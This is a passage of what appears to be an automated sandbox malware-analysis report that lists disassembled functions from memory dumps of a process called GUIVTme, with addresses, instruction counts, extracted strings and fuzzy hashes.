                                                                  Function 01150BC0 Relevance: .3, Instructions: 338COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000010.00000002.2254523904.0000000001150000.00000040.00000800.00020000.00000000.sdmp, Offset: 01150000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_16_2_1150000_GUIVTme.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 68ee0803c9692468574c98f75d1aadc2871e2edc2eb3613b5bd506cf78659a08
                                                                  • Instruction ID: b5e6730592a6b9e909c74de834d57f4b9f98ca1ead8889cbc3d5ba46395bf884
                                                                  • Opcode Fuzzy Hash: 68ee0803c9692468574c98f75d1aadc2871e2edc2eb3613b5bd506cf78659a08
                                                                  • Instruction Fuzzy Hash: B681F434A00341CFDB2AEFB4C45869EBBB2BF88300F15856AE45697365CF35AC85CB40
                                                                  Function 01151C00 Relevance: .0, Instructions: 49COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000010.00000002.2254523904.0000000001150000.00000040.00000800.00020000.00000000.sdmp, Offset: 01150000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_16_2_1150000_GUIVTme.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e17f43afe807f9801d695c71961989601ddee2bc434fc5bec1f8a23460d9f3c0
                                                                  • Instruction ID: 84483af9fe9fa8bdec050cdf640c5c2c499ef448016c7bc112c500e11da3034b
                                                                  • Opcode Fuzzy Hash: e17f43afe807f9801d695c71961989601ddee2bc434fc5bec1f8a23460d9f3c0
                                                                  • Instruction Fuzzy Hash: EE118E76E002469FCB41EFB4D8449EFBBB5FF9920071186AAE519D7221E7709905CB90
                                                                  Function 01151C10 Relevance: .0, Instructions: 44COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000010.00000002.2254523904.0000000001150000.00000040.00000800.00020000.00000000.sdmp, Offset: 01150000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_16_2_1150000_GUIVTme.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 3be3b791f0e08c9174b5743fdca46a2d82c5c82c2a7bf1152abcbfc199e4f792
                                                                  • Instruction ID: f7b19ba5c9c6a177efe9d5afb428bb58c497fa6dcb731a025a00a9c0b8d8691c
                                                                  • Opcode Fuzzy Hash: 3be3b791f0e08c9174b5743fdca46a2d82c5c82c2a7bf1152abcbfc199e4f792
                                                                  • Instruction Fuzzy Hash: 8F019235E0020A9FCB40EFB4D84499BFBF5FF8C200711866AE519D7224E730A905CB90
                                                                  Function 01150F9D Relevance: .0, Instructions: 23COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000010.00000002.2254523904.0000000001150000.00000040.00000800.00020000.00000000.sdmp, Offset: 01150000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_16_2_1150000_GUIVTme.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 90ade87f321c051e5b35afd88d77f41f6239ed73f0f056447b0bc52391a13114
                                                                  • Instruction ID: 74b59b867582e84be854a2446efe422f8ef2ef38cfda49f0982d8e1f605ac0e8
                                                                  • Opcode Fuzzy Hash: 90ade87f321c051e5b35afd88d77f41f6239ed73f0f056447b0bc52391a13114
                                                                  • Instruction Fuzzy Hash: EBF01C74940305DFDB29EB74C198B9D7BF0AB08704F150899D812A7261CBB98984CB51
                                                                  Function 01150898 Relevance: .0, Instructions: 23COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000010.00000002.2254523904.0000000001150000.00000040.00000800.00020000.00000000.sdmp, Offset: 01150000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_16_2_1150000_GUIVTme.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 86c277fcd5aae4e9f302249b045b7d4831eb52fbcc246c41ce841a1000d4d252
                                                                  • Instruction ID: 83da1d3a39d54464ae4bf74379094861d7ceb455b96abbf04f1f917b432df822
                                                                  • Opcode Fuzzy Hash: 86c277fcd5aae4e9f302249b045b7d4831eb52fbcc246c41ce841a1000d4d252
                                                                  • Instruction Fuzzy Hash: 57E01271C05258AFCF54EFB8A4461DF7BF4AE05350B01857AD99AE3201E3748B05CBD1
                                                                  Function 011508A8 Relevance: .0, Instructions: 17COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000010.00000002.2254523904.0000000001150000.00000040.00000800.00020000.00000000.sdmp, Offset: 01150000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_16_2_1150000_GUIVTme.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 88180a0f8f0cc16c0ca78e62566e501a65a8f4d3622076a75c7036da3f171267
                                                                  • Instruction ID: 84bc54d25636feacd4437f6f1bd0d4a45f0488b0f3e26d324256d7b6b8481d4c
                                                                  • Opcode Fuzzy Hash: 88180a0f8f0cc16c0ca78e62566e501a65a8f4d3622076a75c7036da3f171267
                                                                  • Instruction Fuzzy Hash: 5AD017B1D01229EF8B80EFF899051DEBBF8EE08250B000566D91AE3200E3705B108BE1

                                                                  Executed Functions

                                                                  Function 00EF1340 Relevance: 8.0, Strings: 6, Instructions: 524COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000012.00000002.2332699429.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_18_2_ef0000_GUIVTme.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: D@$D@$D@$D@$D@$D@
                                                                  • API String ID: 0-3404515598
                                                                  • Opcode ID: 04e15022da3a241d5dac333a646e0b438c1b334946c9f718ff429a1e7ee46a23
                                                                  • Instruction ID: 1e19c1ccbb94ca1c3e94f4df98d5225fae3b42768587fa16ecd2d94b54d7e0c3
                                                                  • Opcode Fuzzy Hash: 04e15022da3a241d5dac333a646e0b438c1b334946c9f718ff429a1e7ee46a23
                                                                  • Instruction Fuzzy Hash: B822703470060ADFDB14EF34D89067A73A2BBCD349B1899ADC516AB399DB31EC46CB41
                                                                  Function 00EF1AE0 Relevance: 3.8, Strings: 3, Instructions: 66COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000012.00000002.2332699429.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_18_2_ef0000_GUIVTme.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 8aq$D@$D@
                                                                  • API String ID: 0-2975543067
                                                                  • Opcode ID: 181855d65acac2f62fbd71d017891e8b2d032af2f5e021d0f8b2d40a656b9a14
                                                                  • Instruction ID: f65d37dc10f4d113ad23fca2a011c0ef625d8b84e0389dcd520d527ca1bc2464
                                                                  • Opcode Fuzzy Hash: 181855d65acac2f62fbd71d017891e8b2d032af2f5e021d0f8b2d40a656b9a14
                                                                  • Instruction Fuzzy Hash: CB11B935B04208AFC705EF7598516AE7BB5AFC9300F1440E9D60AEB395DE749D06CB92
                                                                  Function 00EF0CF5 Relevance: 1.4, Strings: 1, Instructions: 186COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000012.00000002.2332699429.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_18_2_ef0000_GUIVTme.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: D@
                                                                  • API String ID: 0-2222373746
                                                                  • Opcode ID: a5206dff956e14b8302350476f8b48e93a240398e315c96bf72d86f14564e219
                                                                  • Instruction ID: 2535fe70831e45029b4a033861f37ad2e526468092ab4645432ca77220b11a4e
                                                                  • Opcode Fuzzy Hash: a5206dff956e14b8302350476f8b48e93a240398e315c96bf72d86f14564e219
                                                                  • Instruction Fuzzy Hash: F0718D35A00709CFCB199BB1D4486A9BBF2AFCD300F18896AD5166B2A5DB75AC85CB40
                                                                  Function 00EF1240 Relevance: 1.3, Strings: 1, Instructions: 81COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000012.00000002.2332699429.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_18_2_ef0000_GUIVTme.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: tP]q
                                                                  • API String ID: 0-2175968468
                                                                  • Opcode ID: ec8c125589cee4a82ff9885b6a968f7b49a2b9a27a4dc3e99f7701e773e85db0
                                                                  • Instruction ID: d42045dab16b1d2679b00d24d574b7000be6580788c00448ede7233595b48ba9
                                                                  • Opcode Fuzzy Hash: ec8c125589cee4a82ff9885b6a968f7b49a2b9a27a4dc3e99f7701e773e85db0
                                                                  • Instruction Fuzzy Hash: 612139343412108FCB59AF39C15882D7BE6AF8971A36508B8E506CF3B5DE35DC42CB81
                                                                  Function 00EF1B68 Relevance: 1.3, Strings: 1, Instructions: 21COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000012.00000002.2332699429.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_18_2_ef0000_GUIVTme.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 8aq
                                                                  • API String ID: 0-538729646
                                                                  • Opcode ID: 09f7449fce5a152d3b6bcca5ea2131f4ab36f587b006f8b0b60eef8aa83e35e2
                                                                  • Instruction ID: a496dfdcb00f1bc8c5b42c59ef64108c3f3bb15bb574dd42e147a57f8c9a6ba5
                                                                  • Opcode Fuzzy Hash: 09f7449fce5a152d3b6bcca5ea2131f4ab36f587b006f8b0b60eef8aa83e35e2
                                                                  • Instruction Fuzzy Hash: 0AE0C230240708ABC605BB79A450A6973DEABCC354B0405B9D60AAB288EEA89D0643E6
                                                                  Function 00EF1C10 Relevance: .0, Instructions: 44COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000012.00000002.2332699429.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_18_2_ef0000_GUIVTme.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: db08a9e78f7d4195de93a6f104a75f6db2955c066dc59b1f4de37794c201309a
                                                                  • Instruction ID: f0b9581ac8cbc15abf1c4e1ba15e7441b4045bee4eaa2651e3d921a70236ef0f
                                                                  • Opcode Fuzzy Hash: db08a9e78f7d4195de93a6f104a75f6db2955c066dc59b1f4de37794c201309a
                                                                  • Instruction Fuzzy Hash: 9E01B136E0020A9FCB00EFB4D8408AFFBF5FF8C30071086AAE51997224E771A915CB90
                                                                  Function 00EF0F9D Relevance: .0, Instructions: 23COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000012.00000002.2332699429.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_18_2_ef0000_GUIVTme.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c1a3d8d29bc6bf7970e3144960c77a6fd182695687f027d128c732238ea98b05
                                                                  • Instruction ID: 8e3b7ade040d73c60d19d339c96024162bae86e8ecad62e278c30ddf67a06ccd
                                                                  • Opcode Fuzzy Hash: c1a3d8d29bc6bf7970e3144960c77a6fd182695687f027d128c732238ea98b05
                                                                  • Instruction Fuzzy Hash: B7F01C75A40319CFDB14EB74C5587AD7BF0AB48704F241898D502BB2A0CBB49C84CB51
                                                                  Function 00EF08A8 Relevance: .0, Instructions: 17COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000012.00000002.2332699429.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_18_2_ef0000_GUIVTme.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 032af2529e5ddfc6446e7422f3f17b56b922cfd8c19e4727723594e6200adc77
                                                                  • Instruction ID: 10bfd3c18fdf7b6dafd63a2640f5bbbe578c38f1393ea8c41e08a0e8b8060640
                                                                  • Opcode Fuzzy Hash: 032af2529e5ddfc6446e7422f3f17b56b922cfd8c19e4727723594e6200adc77
                                                                  • Instruction Fuzzy Hash: 43D067B1D0121DAF8B40EFB999051EEBBF8FE49250B104566D919F7201E6705A148BD1
                                                                  Function 00EF1AE5 Relevance: .0, Instructions: 14COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000012.00000002.2332699429.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_18_2_ef0000_GUIVTme.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: dd26b4fe28a0e4bade1c8c7731468f7fe25fac3ffd446caa205c80252a1175a5
                                                                  • Instruction ID: ba2cfe7249185ef3e66239895322c210c8d16e11494babda861336c81a8efe46
                                                                  • Opcode Fuzzy Hash: dd26b4fe28a0e4bade1c8c7731468f7fe25fac3ffd446caa205c80252a1175a5
                                                                  • Instruction Fuzzy Hash: F1D0A735340204CF8710DF28E544C953774EB4E71032040D9E524CB251E761DD10CB41
                                                                  Function 00EF08AD Relevance: .0, Instructions: 13COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000012.00000002.2332699429.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_18_2_ef0000_GUIVTme.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5579e8a945af91d0cb57ebb35d79a83d09a145130539751154c3a17b503073a9
                                                                  • Instruction ID: 8f448c3660baf21c1cbe72806f0f22a7a968a99a4d8abea06e9af8c4bd8da1e1
                                                                  • Opcode Fuzzy Hash: 5579e8a945af91d0cb57ebb35d79a83d09a145130539751154c3a17b503073a9
                                                                  • Instruction Fuzzy Hash: 52D0A771D00219DECF108BB858040DCBFF0EA492B07140395D515F7640E3751601CB80